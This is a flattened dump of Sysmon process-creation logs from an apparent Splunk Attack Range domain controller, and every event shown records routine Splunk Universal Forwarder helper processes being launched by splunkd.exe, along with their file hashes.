AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022734Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:52:18.637{A8622C2F-4512-6078-9305-00000000AE01}6700C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022724Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:52:18.012{A8622C2F-4512-6078-9205-00000000AE01}4000C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022714Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:52:17.137{A8622C2F-4511-6078-9105-00000000AE01}6204C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022559Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:51:23.336{A8622C2F-44DB-6078-9005-00000000AE01}5400C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022546Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:51:21.898{A8622C2F-44D9-6078-8F05-00000000AE01}7164C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022534Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:51:21.226{A8622C2F-44D9-6078-8E05-00000000AE01}7112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022525Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:51:20.367{A8622C2F-44D8-6078-8D05-00000000AE01}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022515Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:51:18.664{A8622C2F-44D6-6078-8C05-00000000AE01}5588C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022504Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:51:17.992{A8622C2F-44D5-6078-8B05-00000000AE01}936C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022495Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:51:17.117{A8622C2F-44D5-6078-8A05-00000000AE01}2248C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022410Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:50:23.337{A8622C2F-449F-6078-8905-00000000AE01}5480C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022398Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:50:21.744{A8622C2F-449D-6078-8805-00000000AE01}4164C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022386Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:50:21.212{A8622C2F-449D-6078-8705-00000000AE01}6868C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022376Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:50:20.353{A8622C2F-449C-6078-8605-00000000AE01}2196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022365Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:50:18.649{A8622C2F-449A-6078-8505-00000000AE01}4912C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022356Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:50:17.978{A8622C2F-4499-6078-8405-00000000AE01}1336C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022346Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:50:17.118{A8622C2F-4499-6078-8305-00000000AE01}6740C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022239Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:49:23.338{A8622C2F-4463-6078-8205-00000000AE01}6556C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022225Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:49:21.885{A8622C2F-4461-6078-8105-00000000AE01}1156C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022214Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:49:21.213{A8622C2F-4461-6078-8005-00000000AE01}4816C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022204Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:49:20.338{A8622C2F-4460-6078-7F05-00000000AE01}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022194Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:49:18.635{A8622C2F-445E-6078-7E05-00000000AE01}3192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022184Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:49:17.963{A8622C2F-445D-6078-7D05-00000000AE01}7132C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022176Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:49:17.119{A8622C2F-445D-6078-7C05-00000000AE01}6060C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022096Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:48:23.479{A8622C2F-4427-6078-7B05-00000000AE01}4872C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022078Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:48:21.886{A8622C2F-4425-6078-7A05-00000000AE01}6640C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022067Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:48:21.214{A8622C2F-4425-6078-7905-00000000AE01}5688C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022056Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:48:20.323{A8622C2F-4424-6078-7805-00000000AE01}5540C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022035Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:48:18.558{A8622C2F-4422-6078-7705-00000000AE01}1216C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022025Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:48:17.964{A8622C2F-4421-6078-7605-00000000AE01}6620C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022017Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:48:17.120{A8622C2F-4421-6078-7505-00000000AE01}716C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000021925Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:47:23.480{A8622C2F-43EB-6078-7405-00000000AE01}6580C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000021912Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:47:21.871{A8622C2F-43E9-6078-7305-00000000AE01}5108C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 